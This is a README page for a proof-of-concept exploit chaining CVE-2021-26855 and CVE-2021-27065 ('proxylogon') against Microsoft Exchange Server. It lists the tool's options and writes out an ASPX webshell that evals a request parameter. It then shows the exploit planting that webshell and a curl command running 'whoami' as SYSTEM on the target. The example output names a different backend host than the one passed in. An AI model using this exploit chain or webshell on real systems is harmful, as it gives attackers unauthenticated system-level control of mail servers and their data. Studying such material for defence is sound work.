
CVE-2021-26855 PoC — Microsoft Exchange Server Remote Code Execution Vulnerability

Associated Vulnerability
Title: Microsoft Exchange Server Remote Code Execution Vulnerability (CVE-2021-26855)
Description
Proof-of-concept exploit for CVE-2021-26855 and CVE-2021-27065: unauthenticated RCE in Microsoft Exchange Server.
Readme
# proxylogon

Proof-of-concept exploit chaining CVE-2021-26855 (the server-side request forgery
that bypasses authentication on the frontend) with CVE-2021-27065 (the
post-authentication arbitrary file write), which together give unauthenticated
remote code execution on Microsoft Exchange Server, as described in the
following resources:

* https://www.microsoft.com/security/blog/2021/03/02/hafnium-targeting-exchange-servers
* https://www.volexity.com/blog/2021/03/02/active-exploitation-of-microsoft-exchange-zero-day-vulnerabilities
* https://www.crowdstrike.com/blog/falcon-complete-stops-microsoft-exchange-server-zero-day-exploits

## Usage

Exploitation requires the external (frontend) URL of the Exchange server (e.g.
`https://exchange.example.org`) and the email address of a valid user on it.
The admin SID and the backend hostname can both be leaked from the server (the
backend via the `X-CalculatedBETarget` response header), so the tool can
discover them itself when they are not supplied.

```
$ python exploit.py -h
usage: exploit.py [-h] [--frontend FRONTEND] [--email EMAIL] [--sid SID]
  [--webshell WEBSHELL] [--path PATH]
  [--backend BACKEND]
  [--proxy PROXY]

proxylogon proof-of-concept

optional arguments:
  -h, --help           show this help message and exit
  --frontend FRONTEND  external url to exchange (e.g. https://exchange.example.org)
  --email EMAIL        valid email on the target machine
  --sid SID            exchange admin sid
  --webshell WEBSHELL  webshell to upload
  --path PATH          desired path to webshell on host
  --backend BACKEND    [optional] backend host (leaked in X-CalculatedBETarget)
  --proxy PROXY        [optional] proxy traffic (e.g. http://127.0.0.1:8080)
```

## Example

```
$ cat <<EOF > webshell.aspx
<script language="JScript" runat="server">
function Page_Load(){
eval(Request["kxpprfgvnosz"],"unsafe");
}
</script>
EOF

$ python exploit.py --frontend https://172.16.59.7 --backend exchange.hafnium.local \
  --email administrator@hafnium.local \
  --webshell webshell.aspx \
  --path 'C:\\Program Files\\Microsoft\\Exchange Server\\V15\\FrontEnd\\HttpProxy\\ecp\\auth\\o.aspx'
Retrieving backend via RPC
Backend: exchange.corp.contoso.com
Identified SID: S-1-5-21-...-500
Admin SID: S-1-5-21-...-500
Authenticating via proxylogon
Looking up OAB virtual directory
OAB virtual directory: OAB (Default Web Site)
Injecting payload into OAB ExternalUrl
Resetting OAB virtual directory
Enjoy your webshell!

$ curl -s -k https://172.16.59.7/ecp/auth/o.aspx \
  -d 'kxpprfgvnosz=Response.Write(
    new ActiveXObject("WScript.Shell")
      .Exec("cmd /c whoami")
      .StdOut
      .ReadAll()
);' | head -n 1
nt authority\system
```
File Snapshot

```
[4.0K] /data/pocs/f3d49719a80b23c1e496a32e85483c5ebfbe94d6
├── [8.3K] exploit.py
├── [ 11K] LICENSE
├── [2.4K] README.md
└── [   8] requirements.txt

0 directories, 4 files
```